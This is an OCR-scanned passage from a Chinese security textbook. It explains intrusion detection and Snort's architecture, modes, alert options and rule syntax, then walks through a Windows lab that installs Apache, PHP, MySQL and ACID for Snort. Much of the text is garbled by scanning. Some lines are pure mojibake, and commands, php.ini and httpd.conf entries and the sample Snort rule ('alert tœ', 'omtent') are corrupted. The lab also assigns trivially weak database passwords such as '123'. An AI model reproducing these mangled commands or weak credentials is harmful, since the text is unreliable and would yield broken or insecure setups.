统计 分 析 用 来 发 现 偏离 正常 模式 的 行为 ,通过 分 析 正 常 应 用 的 属性 得 到 系统 的 统计 
特征 ,对 每 种 正常 模式 计算 出 均值 和 偏差 , 当 侦 测 到 有 的 数值 偏离 正常 值 时 ,就 发 出 报警 
信号 。 这 种 技术 可 以 发 现 未 知 的 攻击 ,尤其 是 复杂 的 攻击 ,但 统计 传感器 误 码 率 较 大 。 

完整 性 分 析 主 要 关注 某 些 文件 和 对 象 的 属性 是 否 发 生 了 变化 。 完 整 性 分 析 通 过 被 称 
为 消息 摘录 算法 的 超 强加 密 机 制 , 可 以 感受 到 微小 的 变化 。 这 种 分 析 可 以 侦 测 到 任何 使 
文件 发 生变 化 的 攻击 ,弥补 了 签名 分 析 和 统计 分 析 的 缺陷 ,但 是 这 种 分 析 的 实时 性 很 差 。 

3) 对 攻击 和 误 用 的 反应 

有 些 基于 网 络 的 检测 系统 可 以 针对 侦 测 到 的 问题 作出 反应 。 这 些 反 应 主要 有 改变 环 
境 效用 检验 、 实 时 通知 等 。 改 变 环 境 通常 包括 关闭 连接 、 重 新 设置 系统 。 由 于 改变 了 系 
统 的 环境 ,因此 可 以 通过 设置 代理 和 审计 机 制 获 得 更 多 的 信息 ,从 而 跟踪 黑客 。 许 多 实时 
系统 还 允许 管理 员 选 择 一 种 预警 机 制 ,把 发 生 的 问题 实时 地 送 往 各 个 地 方 。 

4) 管理 和 安装 

用 户 采 用 检测 系统 时 ,需要 根据 本 网 的 一 些 具 体 情 况 确定 。 实 际 上 ,没有 两 种 完全 相 
同 的 网 络 环境 ,因此 ,就 必须 对 采用 的 系统 进行 配置 。 比 如 ,可 以 配置 系统 的 网 络 地 址 6 
全 条 目 等 。 某 些 基 于 主机 的 检测 系统 还 提供 友好 的 用 户 界面 ,让 用 户 说 明 需 要 传感器 采 
集 哪些 信息 。 


7.1.3 Snort 简介 


Snort 是 Martin Roesch 等 人 开发 的 一 种 由 C 语言 编写 的 开放 源码 的 人 侵 检测 系统 。 
Martin Roesch 把 Snort 定位 为 一 个 轻 量 级 的 、 跨 平台 、 支 持 多 操作 系统 的 入 侵 检 测 系统 。 
它 具 有 实时 数据 流量 分 析 和 IP 数据 包 日 志 分 析 的 能 力 , 具 有 跨 平台 特征 ,能 够 进行 协议 
分 析 和 对 内 容 的 搜索 /匹配 。 它 能 够 检测 不 同 的 攻击 行为 ,如 缓冲 区 溢出 、 端 口 扫描 、 
DoS 攻击 等 ,并 进行 实时 报警 。Snort 可 安装 在 网 络 上 的 一 台 主 机 上 对 整个 网 络 进行 
监视 。 

Snort 由 三 个 子 系统 构成 : 数据 包 解 码 器 .检测 引擎 .日 志 与 报警 系统 。 在 使 用 Snort 
之 前 ,需要 根据 网 络 环境 和 安全 策略 对 Snort 进行 配置 ,主要 包括 设置 网 络 变量 .配置 预 
处 理 器 (preprocessors) 配置 输出 插件 ,配置 所 使 用 的 规则 集 。 在 入 侵 检测 过 程 中 采用 了 
规则 匹配 的 检测 方法 ,所 以 误 报 率 较 低 。 
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Snort 有 三 种 工作 模式 : 嗅 探 器 、 数 据 包 记录 器 .网 络 人 侵 检测 系统 。 嗅 探 器 模式 仅 
仅 是 从 网 络 上 读 取 数据 包 并 作为 连续 不 断 的 流 显 示 在 终端 上 。 数 据 包 记录 器 模式 把 数据 
包 记 录 到 硬盘 上 。 网 络 和 人 侵 检测 模式 是 最 复杂 的 ,而 且 是 可 配置 的 ,可 以 让 Snort 分 析 网 
络 数据 流 以 匹配 用 户 定义 的 一 些 规则 ,并 根据 检测 结果 采取 一 定 的 动作 。 


7.1.3.1 功能 特征 

虽然 Snort 是 一 个 轻 量 级 的 入 侵 检测 系统 ,但 是 它 的 功能 却 非常 强大 ,其 特点 如 下 : 

CD 跨 平台 性 。 可 以 支持 Linux, Solaris, UNIX, Windows 系列 等 平台 ,而 大 多 数 商 
用 入 侵 检测 软件 只 能 支持 一 两 种 操作 系统 ,甚至 需要 特定 的 操作 系统 。 

(2) 功能 完备 。 具 有 实时 流量 分 析 的 能 力 ,能够 快速 地 监测 网 络 攻击 ,并 能 及 时 地 发 
出 警报 。 使 用 协议 分 析 和 内 容 匹配 的 方式 ,提供 了 对 TCP, UDP, ICMP 等 协议 的 支持 ， 
对 缓冲 区 溢出 、 隐 蔽 端口 扫描 `CGI 扫描 、SMB 探测 .操作 系统 指纹 特征 扫描 等 攻击 都 可 
以 检测 。 

СЗ) 使 用 插件 的 形式 。 方 便 管 理 员 根 据 需要 调用 各 种 插件 模块 ,包括 输入 插件 和 输 
出 插件 。 

输入 插件 主要 负责 对 各 种 数据 包 的 处 理 , 具 备 传输 层 连接 恢复 .应 用 层 数据 提取 、 基 
于 统计 的 数据 包 异 常 检测 的 功能 ,从 而 拥有 很 强 的 系统 防护 功能 ,如 使 用 TCP 流 插件 ,可 
以 对 TCP 包 进 行 重组 。 

输出 插件 则 主要 用 来 将 检测 到 的 报警 以 多 种 方式 输出 ,通过 输出 插件 可 以 输出 到 
MySQL, SQL 等 数据 库 中 ,还 可 以 以 XML 格式 输出 ,也 可 以 把 网 络 数据 保存 到 
TCPDump 格式 的 文件 中 ;按照 其 输出 插件 规范 ,用 户 甚至 可 以 自己 编写 插件 ,自己 来 处 
理 报警 的 方式 并 进而 作出 响应 ,从 而 使 Snort 具有 非常 好 的 可 扩展 性 和 灵活 性 。 

(4) Snort 规则 描述 简单 。Snort 基于 规则 的 检测 机 制 十 分 简单 和 灵活 ,使 得 可 以 迅 
速 对 新 的 入 侵 行为 做 出 反应 ,发 现 网 络 中 潜在 的 安全 漏洞 。 同 时 该 网 站 提供 几乎 与 
http://www. cert. org( 应 急 响 应 中 心 ,负责 全 球 的 网 络 安全 事件 以 及 漏洞 的 发 布 ) 同 步 
的 规则 库 更 新 ,因此 ,甚至 许多 商业 的 入 侵 检测 软件 可 以 直接 使 用 Snort 的 规则 库 。 
图 7.1 显示 了 Snort 的 系统 组 成 和 数据 处 理 流 程 。 
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O 数据 包 捕获 器 。 基 于 网 络 的 入 侵 检测 系统 需要 捕获 并 分 析 所 有 传输 到 监控 网 卡 
的 网 络 数据 ,这 就 需要 包 捕 获 技术 。Snort 通过 两 种 机 制 来 实现 包 捕 获 技术 : 一 种 是 将 网 
卡 设置 为 混杂 模式 ; 另 一 种 是 利用 Libpcap/ Winpcap 函数 库 从 网 卡 捕获 网 络 数 据 包 。 
数据 包 捕 获 函 数 库 是 一 个 独立 的 软件 工具 ,能 直接 从 网 卡 获取 数据 包 。 该 函数 库 是 
由 Berkeley 大 学 Lawrence Berkeley National Laboratory 人 研究 院 开发 ,Libpcap 支持 所 有 
基于 可 移植 操作 系统 接口 (portable operating system interface of UNIX,POSIX) 的 操作 
系统 ,如 Linux、UNIX 等 ,后 来 为 支持 跨 平台 特性 ,又 开发 了 Windows 版 本 (http:// 
www. winpca p. org), Windows 下 和 Linux 的 函数 调用 几乎 完全 相同 ,Snort 就 是 通过 调 
用 该 库 函 数 从 网 络 设备 上 捕获 数据 包 。 
© 数据 包 解 码 器 。 数据 包 解码 器 主要 是 对 各 种 协议 栈 上 的 数据 包 进 行 解析 、 预 处 
理 , 以 便 提交 给 检测 引擎 进行 规则 匹配 。 解 码 器 运行 在 各 种 协议 栈 之 上 ,从 数据 链 路 层 到 
传输 层 , 最 后 到 应 用 层 , 因 为 当前 网 络 中 的 数据 流速 度 很 快 ,如 何 保障 较 高 的 速度 是 解码 
器 子 系统 中 的 一 个 重点 。 目 前 , Snort 解码 器 所 支持 的 协议 包括 Ethernet, SLIP 和 
PPP 等 。 
© 预 处 理 器 。 预 处 理 模块 的 作用 是 对 当前 截获 的 数据 包 进 行 预先 处 理 , 以 便 后 续 处 
理 模 块 对 数据 包 的 处 理 操 作 。 由 于 最 大 数据 传输 单元 (MTU) 限 制 及 网 络 延迟 等 问题 ,路 
由 器 会 对 数据 包 进 行 分 片 处 理 。 但 是 恶意 攻击 者 也 会 故意 发 送 经 过 软件 加 工 过 的 数据 
包 , 以 便 把 一 个 带 有 攻击 性 的 数据 包 分 散 到 各 个 小 的 数据 包 中 ,并 有 可 能 打 乱 数据 包 传输 
次 序 , 分 多 次 传输 到 目标 主机 。 因 此 ,对 异常 数据 包 的 处 理 也 是 入 侵 检 测 系 统 的 重要 
内 容 。 
预 处 理 器 包括 以 下 插件 : 
* 模拟 TCP/IP 堆栈 功能 的 插件 ,如 IP 碎片 重组 .TCP 流 重组 插件 。 
。 各 种 解码 插件 ,如 HTTP 解码 插件 、Unicode 解码 插件 、RPC 解码 插件 .Telnet fif 
码 插件 等 。 
。 规则 匹配 无 法 进行 攻击 检测 时 所 用 的 插件 ,如 端口 扫描 插件 .Spade 异常 入 侵 检 
测 插件 .Bo 检测 插件 .ARP 欺骗 检测 插件 等 。 根 据 各 预 处 理 插件 文件 名 可 对 此 
插件 功能 做 出 推断 。 
© 检测 引擎 。 检 测 引 擎 是 入 侵 检测 系统 的 核心 内 容 ,Snort 用 一 个 二 维 链表 存储 它 
的 检测 规则 ,其 中 一 维 称 为 规则 头 , 另 一 维 称 为 规则 选项 。 规 则 头 中 放置 的 是 一 些 公共 属 
性 特征 ,而 规则 选项 中 放置 的 是 一 些 和 人 侵 特 征 。Snort 从 配置 文件 读 取 规 则 文件 的 位 置 ， 
并 从 规则 文件 读 取 规 则 ,存储 到 二 维 链表 中 。 
Snort 的 检测 就 是 二 维 规则 链表 和 网 络 数据 匹配 的 过 程 , 一 旦 匹配 成 功 则 把 检测 结 
果 输 出 到 输出 插件 。 为 了 提高 检测 速度 ,通常 把 最 常用 的 源 / 目 的 IP 地 址 和 端口 信息 放 
在 规则 头 链表 中 ,而 把 一 些 独特 的 检测 标志 放 在 规则 选项 链表 中 。 规 则 匹配 查找 采用 递 
归 的 方法 进行 ,检测 机 制 只 针对 当前 已 经 建立 的 链表 选项 进行 检测 , 当 数据 包 满 足 一 个 规 
则 时 ,就 会 触发 相应 的 操作 。Snort 的 检测 机 制 非 常 灵活 ,用 户 可 以 根据 自己 的 需要 很 方 
便 地 在 规则 链表 中 添加 所 需要 的 规则 模块 。 
(5) 日 志和 报警 子 系统 。 日 志和 报警 子 系统 可 以 在 运行 Snort 的 时 候 以 命令 行 交 互 
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的 方式 进行 选择 ,如 果 在 运行 时 指定 了 命令 行 的 输出 开关 ,在 Snort 规则 文件 中 指定 的 输 
出 插件 会 被 蔡 代 。 现 在 可 供 选 择 的 日 志 形 式 有 三 种 ,报警 形式 有 六 种 。Snort 可 以 把 数 
据 包 以 解码 后 的 文本 形式 或 者 TCPDump 的 二 进 制 形式 进行 记录 。 解 码 后 的 格式 便于 系 
统 对 数据 进行 分 析 , 而 TCPDump 格式 可 以 保证 很 快 地 完成 磁盘 记录 功能 ,第 三 种 日 志 机 
制 就 是 关闭 日 志 服 务 , 什 么 也 不 做 。 使 用 数据 库 输出 插件 ,Snort 可 以 把 日 志 记 入 数据 
库 , 当 前 支持 的 数据 库 包括 Postgresql, MySQL. Oracle 以 及 UNIX ODBC 数据 库 。 


7.1.3.2 基本 操作 
1. 启动 
Snort 作为 网 络 人 侵 检测 系统 ,使 用 下 面 命令 行 可 以 启动 这 种 模式 : 


Snort - dev - 1 log - h 192.168.1.0/24 - c Snort.conf 


Snort 就 会 对 每 个 包 和 规则 集 进 行 匹配 ,发现 这 样 的 包 就 会 根据 规则 的 设置 采取 相 
应 的 行动 。 如 果 不 指定 输出 目录 ,Snort 就 输出 到 /var/log/Snort 目录 中 。 
也 可 以 采用 如 下 简单 的 命令 方式 : 


Snort - i 2 – с Snort.conf 


其 中 ,i 选项 为 选择 网 卡 ;网 络 监 控 方 式 以 及 输出 方式 都 在 Snort. conf 中 被 定义 。 

2. 输出 

在 网 络 人 侵 检 测 模式 下 ,有 多 种 方式 来 配置 Snort 的 输出 。 在 默认 情况 下 ,Snort 以 
ASCI 格式 记录 日 志 , 使 用 full 报警 机 制 。 

Snort 有 六 种 报警 机 制 : full、fast、socket、syslog、smb(winpopup) 和 none。 其 中 ,有 
四 个 可 以 在 命令 行 状态 下 使 用 -A 选项 设置 。 

。 -A fast: 报警 信息 包括 一 个 时 间 惟 (timestamp) ,报警 消息 、 源 /目的 IP 地 址 和 

端口 。 

。 -A full: 是 默认 的 报警 模式 。 
-A unsock: 使 Snort 将 报警 信息 通过 UNIX 的 套 接 字 发 往 一 个 负责 处 理 报警 信 
息 的 主机 ,在 该 主机 上 有 一 个 程序 在 套 接 字 上 进行 监听 。 
-A none: 关闭 报警 机 制 。 

3. 规则 集 

规则 集 是 Snort 的 攻击 特征 库 , 每 条 规则 是 一 条 攻击 标识 ,Snort 通过 它 来 识别 攻击 
行为 。Snort 使 用 一 种 简单 的 、. 轻 量 级 的 规则 描述 语言 ,这 种 语言 灵活 而 强大 。 一 条 
Snort 规则 可 以 从 逻辑 上 分 为 两 个 部 分 : 规则 头 (括号 左边 的 内 容 ) 和 规则 选项 (括号 内 的 
内 容 ) 。 

规则 头 包含 有 匹配 的 行为 动作 ,协议 类 型 . 源 IP 及 端口 .数据 包 方向 .目标 IP 及 端 
口 。 动 作 包 括 三 类 :告警 (Alert) .日 志 (Log) 和 通行 (Pass) ,表明 Snort 对 包 的 三 种 处 理 
方式 。 其 中 最 常用 的 就 是 Alert 动作 , 它 会 向 报警 日 志 中 写 和 报警 信息 。 

在 源 地 址 、 目 的 地 址 、 端 口中 可 以 使 用 any 来 代表 任意 的 地 址 或 端口 ,还 可 以 使 用 符 
号 “1” 来 表明 取 非 运算 。IP 地 址 可 以 被 指定 为 一 个 CIDR 的 地 址 块 ,端口 也 可 以 指定 一 
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Ar TU Ei] . E EI ЖЕЛЕ DH: VY en DE” A HG TT o 

ЖАЙ А E 3 ИБ a: FH — P Be LPS EE A Т IL E 27 [o] As”. E Se HE A 
EZE: OB. RE RL UU GE HT A PT T Snort 检测 引擎 的 核心 。 选 项 主要 分 为 
四 类 : 数据 包 相 关 各 种 特征 的 说 明 选 项 .与 规则 本 身 相 关 的 一 些 说 明 选 项 ,规则 匹配 后 的 
动作 选项 、 对 某 些 选项 的 进一步 修饰 。 

下 面 是 一 个 规则 范例 : 


alert tœ any any- > 192.168.1.0/24 111 (omtent:"| 00 01 86 a5|"; msg: "mountd access";) 


该 规则 表示 监控 的 网 络 数据 的 协议 为 TCP 协议 , 源 地 址 、 源 端口 为 任意 值 ,方向 为 由 
外 向 内 ,内 部 的 网 络 地 址 为 子 网 192. 168. 1. 0/24, 端 口号 为 111. 当 发 现 数据 包 中 有 
“00 01 86 a5” 内 容 时 ,Snort 会 发 送 报警 信息 mountd access. 


7.2 Snort 入 侵 检 测 实 例 


实验 器 材 
。 Snort 软件 系统 1 E. 
* PC(Windows XP/Windows 7)1 #. 


预习 要 求 

。 做 好 实验 预习 ,复习 入 侵 检 测 技术 的 有 关内 容 。 

。 熟悉 Snort 软件 的 使 用 方法 。 

* 熟悉 实验 过 程 和 基本 操作 流程 。 

。 做 好 预习 报告 。 

实验 任务 

通过 本 实验 ,掌握 安装 并 运行 一 个 Snort 系统 的 方法 ;了 解 入 侵 检测 系统 的 作用 和 
功能 。 

实验 环境 

装 有 Windows XP/Windows 7 操作 系统 的 PC 一 台 。 

预备 知识 

入 侵 检测 原理 。 

实验 步 又 

现 将 本 实验 需要 的 组 件 以 及 其 作用 和 功能 介绍 如 下 。 

(1) Winpcap: Windows 环境 下 的 捕获 网 络 数据 包 驱 动 程序 库 , 下 载 地 址 : http:// 
www. winpcap. org/ 。 

(2) Snort; 入侵 检测 主 程序 ,网 站 提供 Windows 下 的 安装 版 本 ,可 以 直接 下 载 安装 。 
源 代 码 在 Linux 下 可 以 直接 编译 生成 ;在 Windows 下 使 用 Visual Studio 系列 的 编译 器 ， 
在 工程 设置 中 将 几 个 预 处 理 设置 禁止 ,可 以 编译 通过 ,同时 需要 下 载 Snort 规则 。 下 载 地 
址 : http://www. snort. org/ 。 
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(3) Apache: 为 系统 提供 了 Web 服务 支持 ,下 载 地 址 : http://www. apache. org/ 。 

(4) PHP: 为 系统 提供 了 РНР 支持 ,使 Apache 能 够 运行 PHP 程序 ,下 载 地 址 : 
http://www. php. net/, 

(5) MySQL: 存储 各 种 报警 事件 的 数据 库 系 统 , 下 载 地 址 : http://www. mysql. com/ 。 

(6) ACID: ACID(analysis console for intrusion databases) 是 基于 PHP 的 人 侵 检 测 
数据 库 分 析 控 制 台 , 它 能 够 处 理由 各 种 入 侵 检测 系统 防火墙 等 安全 工具 产生 并 放 入 数据 
库 中 的 安全 事件 ,安装 PHP 就 是 为 了 使 用 ACID. 下载 地 址 : http://acidl ab. 
sourceforge. net/ , 

(7) Adodb; Adodb 是 PHP 连接 数据 库 的 组 件 , 下 载 地 址 ;http://adodb. 
sourceforge. net/ 。 

(8) Jpgraph: FH PHP 编写 的 基于 面向 对 象 技 术 的 图 形 显示 链接 库 , ACID 通过 
Adodb 读 取 Snort 在 MySQL 中 产生 的 数据 ,将 分 析 结 果 显示 在 网 页 上 ,并 使 用 Jpgraph 
组 件 对 其 进行 图 形 化 显示 分 析 。 下 载 地址 : http://www. aditus. nu/jpgraph/。 

1. 安装 Apache 服务 器 

(1) 双击 httpd-2. 2. 17-win32-x86-no_ssl. msi。 

(2) 出 现 Windows 标准 的 软件 安装 欢迎 界面 ,直接 单 击 Next 按钮 继续 ,出 现 授权 协 
议 ,选择 同意 授权 协议 ,然后 继续 ,出 现 安装 说 明 。 

(3) 在 Network Domain 中 填写 网 络 域名 ,如 kysf. net ,如 果 没 有 网 络 域名 ,可 以 任 
意 填写 。 如 果 架 设 的 Apache 服务 器 要 放 入 Internet , 则 一 定 要 填写 正确 的 网 络 域名 。 
TE Server Name 中 填 入 服务 器 名 ,如 www. kysf. net, 即 主机 名 。 在 Administrator’ s 
Email Address 中 填写 系统 管理 员 的 电子 邮件 地 址 ,如 indian@163. com。 上 述 三 条 信息 
仅 供 参考 ,其 中 ,电子 邮件 地 址 会 在 系统 出 现 故障 时 提供 给 访问 者 ,如 图 7.2 所 示 。 


| Apache 


Server Information. 
Please enter your server's information. 


Network Domain (e.g. somenet.com) 
localhost 


Server Name (e.g. www.somenet.com): 
localhost. 


Administrator's Email Address (e.g. webmaster @somenet.com): 
[793144750@qq.com 
Install Apache HTTP Server 2.2 programs and shortcuts for: 


© for All Users, on Port 80, as a Service — Recommended. 
@ only for the Current User, on Port 8080, when started Manually. 


Installshield 
(emen [ono | бакч) 
图 72 Apache 安 装 界面 
(4) 确认 安装 选项 无 误 , 如 果 要 再 检查 一 遍 , 可 以 单 击 Back 按钮 返回 检查 。 单 击 
Install 按钮 开始 安装 。 
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(5) 检测 方法 : 选择 端口 8080. 使 用 httpd -k install.” 命 令 将 Apache REN 
Windows 中 的 服务 ( к Apache 2. 2 之 前 的 版 本 ,输入 “apache -k install”) ,如 图 7. 
所 示 ;车 选择 端口 80, 则 无 需 进 行 该 步骤 。 


bin>httpd -k install 
fipach К 


图 7з 8080 端 口 检测 界面 


(6) 通过 上 述 方式 ,在 DOS 或 者 浏览 器 下 运行 , 均 有 启动 成 功 显示 o 

择 定制 安装 ,安装 在 默认 文件 夹 C pues 下 。 安 装 程序 会 在 该 文件 夹 下 自动 
产生 一 i 子 文件 夹 apache? ,继续 如 图 7.4 所 示 , 打 开 配 置 文件 C:\Apache\ 
apache2\conf\httpd. conf( 版 本 不 同 , 可 Ni 是 C:\Apache\conf\httpd. conf) ,将 其 中 的 
Listen 8080 更 改 为 Listen 50080。 这 是 由 于 Windows IIS 中 的 Web 服务 器 默认 情况 
下 在 TCP 80 端口 监听 连接 请 求 , 而 8080 端口 一 i 留 给 代理 服务 器 使 用 ,所 以 为 了 
避免 Apache Web 服务 器 的 监听 端口 与 其 发 生 冲 突 , 将 Apache Web 服务 器 的 监听 端 
口 修改 为 不 常用 的 高 端 端口 50080。 如 果 安 装 的 时 候 80 端口 未 被 占用 , 则 无 需 修 改 


端口 。 


局 httpdconf- 记事 本 d -Jalxl 
KFE) MRE) ) WB) 

# Change this to Listen on specific IP addresses as shown below to 

# prevent Apache from glomming onto all bound IP addresses (0.0.0.0) 


# 
#Listen 12.34.56.78:80 
Listen 50080 


# 
# Dynamic Shared Object (DS0) Support 


图 74 Apade 配 置 界面 

选择 “开始 ”| “运行 ”命令 ,输入 “cmd”, 进 入 命令 行 方 式 。 输 入 下 面 的 命令 : 
C:\> cd apache\ apache2\bin 
C:\apache\apache2\bin\ apache - k install 
这 是 将 Apache iE EJ Windows 中 的 服务 方式 运行 。 
在 浏览 器 中 进行 访问 时 ,使 用 http://localhost:50080/ 即 可 。 
2. 添加 Apache aA PHP 的 支持 
(1) 解压 缩 php-5. 2. 6-Win32. zip Æ C:\Php。 
(2) 将 php5ts. dll 文件 复制 到 ， У systemroot %\system32, 
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(3) 将 php. ini-dist M Plc Sc ) s iil 8l % systemroot %\php. ini. EM php. ini: 


extension-php 912.01 
extension- php mysql.dll 


WR php. ini 有 该 句 ,将 此 语句 前 面 的 ; ”注释 符 去 掉 , 如 图 7.5 所 示 。 


Ж php.ini - 记事 本 -|alx| 
文件 E) 编辑 E) 格式 (2) TR) 

;extension-php, domxml.d11 

;extension-php exif.dll 

;extension-:php, fdf.dll 

;extension:php, filepro.dll 


extension=php_gd2.d 


;extension-php gettext.dll 
;extension=php_hyperwave.d11 
;extension-php, iconu.dll 
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同时 复制 C; NPhpVextension 下 的 php_gd2. dll 和 php. mysql. dll 至 %systemroot%\, 
(4) 添加 gd 图 形 库 的 支持 ,在 C:\Apache\Apache2\conf\httpd. conf 中 添加 : 


LoadModule php5 module "C:/Php5/php5apache?.d11" 

注意 ; Apache 版 本 在 2. 2 以 上 的 要 换 成 LoadModule php5_module "C;/Php5/ 
php5apache2_2. dll" ,否则 无 法 restart, 

在 AddType application 一 行 下 面 加 入 两 行 信息 : 

Rdrype application/x- httpd- php -php .phtml .php3 .php4 

AddType application/x- httpd- php- source .phps 


(5) 添加 好 后 ,保存 http. conf 文件 。 单 击 “ 开 始 ” 按 钮 ,选择 “运行 "命令 ,在 弹出 的 窗 
口中 输入 ста 进入 命令 行 方式 ,输入 命令 : net start apache2. TE Windows 中 启动 Apache 
Web 服务 ,如 图 7.6 所 示 。 


INWINNTVSyStemS2A \cmd.exe 
oft Wi [Versi 


t start apache2 


图 76 Apadhe 启 动 界面 


测试 PHP 脚本 : 
在 C:\Apache2\htdocs 目录 下 新 建 test. php.test. php 文件 内 容 : 


( 2phpinfo () ;?) 
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使 用 http: //localhost/test. php (@% http://127. 0. 0. 1:50080/test. php) 测试 PHP 

ко 
.安装 配置 Snort 

nen WinPcap_4_0_2. exe, 默 认 安 装 即 可 。 

版 本 一 : 安装 Snort 2 8 1 Installer. exe, 默 认 安 装 即 可 ,Snort 的 默认 安装 路 径 为 
C:\Snort, 

将 snortrules-snapshot-CURRENT 目录 下 的 所 有 文件 复制 (全 选 ) 到 С: NSnort Н 
жт. 

енн snort. conf 覆盖 С: udo сыен; conf, 
CASnort. 

将 snortrules-snapshot-CURRENT 目录 下 的 所 有 文件 复制 (全 选 ) 到 C: NSnortN 
rules 目录 下 。 

文件 open-test. conf 中 会 有 snortrules 的 规则 ,对 应 C:\Snort\etc 下 的 snort. conf 
内 部 的 使 用 规则 ,可 以 自行 更 改 。 

4. 安装 MySQL 配置 MySQL 

(1) 解压 mysql-5. 0. 51b-win32. zip, 并 安装 到 默认 文件 夹 C:\Mysql。 采 取 默 认 安 
装 。 设 置 数据 库 实 例 流 程 ,如 图 7.7 至 图 7. 14 所 示 。 


MySQL Server Instance Configuration 
Configure the MYSQL Server 5.0 server instance 


Please select а configuration type. 


G Detailed Configuration. 
ea pe nea ашын о 


С Standard Configuration 
Lise this only an machinas that do not already have a MySQL server 
instalation. This wil use a general purpose configuration for the. 
server that can Ee tuned н чаа 


аа Св] = | 
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安装 路 径 ; C:\Program Files\MySQL\MySQL Server 5.1. 

(2) 在 命令 行 方式 下 输入 net start mysql, 启 动 MySQL 服务 ,显示 “请 求 的 服务 已 经 
启动 ”。 

(3) 注意 设置 root 账号 和 密码 ,并 在 命令 行 方 式 下 进入 C:\Mysql\bin, 输 入 下 面 的 


命令 : 


C: Mysql \bin\mysqld - nt - install 
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QL Server Instance Configuration Tizard 
MySQL Server Instance Configuration 
Configure the MySQL Server 5.0 server instance. 


Please select a server type. This will influence memory, disk and CPU usage. 


€ Developer Machine 
LI This is a development machine, and many other applications will be: 
Tun on t, MySQL Server should only use a minimal amount of 
memery, 


eee elec jeer йл WA be ЕЕЕ 
J his ороп for wel Jappiicetion servers: MySQL үй have тиет) 
menery usage, 


С Dedicated MySQL Server Machine 


This machine is dedicated to run the MySQL Database Server. No 
other servers, such аз a web or mail server, wil be гип, MySQL wil 
utlize up to all available memory. 


Los» | в] cm 
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MySQL Server Instance Configuration Tizard 
MySQL Server Instance Confiquration 


Configure the MYSQL Server 5.0 server instance 


Please selec: the database usage, 


General purpose databases. This wil optimize the server for the use 
oF the Fast transactional InnoDB storage engine and the high speed 
MyISAM storage engine, 


© Transactional Database Unly 


3 Gpinised for soocation servers and transactional veb 
This nil make InnoDB the main storage angine. Nota that the 
MyISAM engine can stil be used. 


С Non-Transartinnal Database Ппіу 


—] Stated for simpl wab applications, maraoring or lagging applicatione 
27 2) as nell as analysis programs. Only the norraransactional MyISAM 
< «оғада engine will ba activated. 


cu Са] cm | 
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MySQL Server Instance Configuration Wizard 


MySQL Server Instance Configuration 
Configure the MySQL Server 5.0 server instance 


Please set the approximate number oF concurrenct connections bo the server. 


hich number of concurrent connections. A number of 20 connections 
wl be assumed. 
© Online Transaction Processing (OLTP) 


Choose this option for highly concurrent applications that may have 
at any one Eme up tc 503 acbve connections such ss heavily loaded 


Web servers. 

C Manual Setting 
Please enter tha approximate number af concurrent connactions. 
Concurrent connections: 15 z| 


Е cea | 
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MySQL Server Instance Configuration 


‘Configure the MySQL Server 5.0 server instance. 


Please set the networking options. 


[V Enable TCP/IP Networking 
Enable this to allow TCF/IP connections. When disabled, only loca! 
‘connections through named pipes ar allowed. 


Port Number; 


Please set the server SQL тосе. 


[V Enable Strict Mode 
This option forces the ser var to behave more lies a traditional 
database server. T is recommended tc enable this eption, 


<Back Cancel 
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guration T 
MySQL Server Instance Configuration 

Configure the MySQL Server 5.0 server instance. | 

Please select the defauk character set. 


(C Standard Character Set 
$ Makes Latini the default charset, thes character set is cuted for 


Engish and other ‘West European languages. 


(© Best Support For Multilingualism 
Make UTFS the default character set, This is the recommended 
character set for storing text in many different lanquaces. 


(C Manual Selected Default Character Set / Collation 
了 ) Please spacy the character set to use. 


Character Set; z] - 


sek | [nets] _ сше 
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MySUL Server Instance Configuration Tizard 


MySQL Server Instance Configuration 
Configure the MySQL Server 5.0 server instance. < 
Please set the Windows options, 


Е Install As Windows Service 


This is the recommended way tn run the MySQL server 
Р 1 cn windows, 


is directory containing the 
DEM server / client executables in the Windows PATH variable 
sc they can be called from the command line. 


c Ca emn | 
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MySUL Server Instance Configuration 
Configure the MySQL Server 5.0 server instance, 


Please set the security options. 
Tv. Modify Security Settings 
po pee | Ente the current password. 
TOU Karot password: [= Enter the root password. 
cf 1 Retype the password. 
v. Enabie roct access from remote machines 


[^ Creata an anonymous Account 


This option eid eraate ап arceymous account on ths servar. Please 
nate thet this canlead to an inseoure system, 


хык | [на] eme 
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在 命令 行 方式 下 输入 net start mysql. Ja 2] MySQL 服务 。 在 安装 目录 下 (一 般 为 C: 
\Mysql\bin) 单 击 “ 开 始 "按钮 ,选择 “运行 ”命令 ,输入 命令 : cmd, 在 出 现 的 命令 行 窗口 中 
输入 下 面 的 命令 : 

C:\> cd mysql\bin 

C:\Mysql\bin> mysql - u root -p 

输入 刚才 设置 的 root 密码 ,运行 以 下 命令 : 

create database Snort; // 在 输入 分 号 后 MysSQL 才 会 编译 执行 语句 

create database Snort_archive; 

//create 语 句 建立 了 snort 运 行 必需 的 snort 数 据 库 和 snort_archive 数 据 库 
运行 以 下 命令 ， 

C:\Mysql\bin\mysql - D snort - u root - p< C:\Snort\contrib\create mysql 

C:\Mysql\bin\mysql - D snort archive -u root - p< C:\Snort\contrib\create mysql 

上 面 两 个 语句 表示 以 root 用 户 身 份 使 用 C: NSnortNcontrib 目录 下 的 create. mysql 
脚本 文件 ,在 Snort 数据 库 和 Snort_archive 数据 库 中 建立 了 Snort 运行 必需 的 数据 表 。 
再 次 以 root 用 户 登 录 MySQL 数据 库 ,在 提示 符 后 输入 下 面 的 语句 ， 


grant usage on* .* to "acid"@ "localhost" identified by "acidtest"; 
grant usage on* .* to "Snort"@ "localhost" identified by "Snorttest"; 


上 面 两 个 语句 表示 在 本 地 数据 库 中 建立 了 acid( 密 码 为 acidtes 和 Snort( 密 码 为 
Snorttest) 两 个 用 户 , 以 备 后 面 使 用 。 


set password for "асіа"@ "localhost"= password ("123"); 
set password for "Snort"@ "localhost"- password ("123") ; 
grant select, insert, update, delete, create, alter on Snort . * to "acid"@ "localhost"; 
grant select, insert, update, delete, create,alter on Snort archive . * to "acid" "localhost"; 
grant select, insert, update, delete, create, alter on Snort . * to "Snort"@ "localhost"; 
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grant. select, insert, update, delete, create,alter on Snort archive . * to "snort"@ "localhost"; 


上 述 操 作 是 为 新 建 的 用 户 在 Snort 和 Snort archive 数据 库 中 分 配 权 限 。 

建立 Snort 输出 安全 事件 所 需要 的 表 , 其 中 C:\Snort 为 Snort 的 安装 目录 。 

5. 安装 其 他 工具 

(1) 安装 Adodb, 解 压缩 adodb497. zip 到 C:\Php\adodb 目录 下 。 

(2) 安装 Jpgrapg 库 , 解 压缩 jpgraph-1. 22. 1. tar. gz 到 C:\Php\jpgraph. 并 且 修 改 
C;\Php\jpgraph\sre\jpgraph. php ,添加 如 下 一 行 ， 


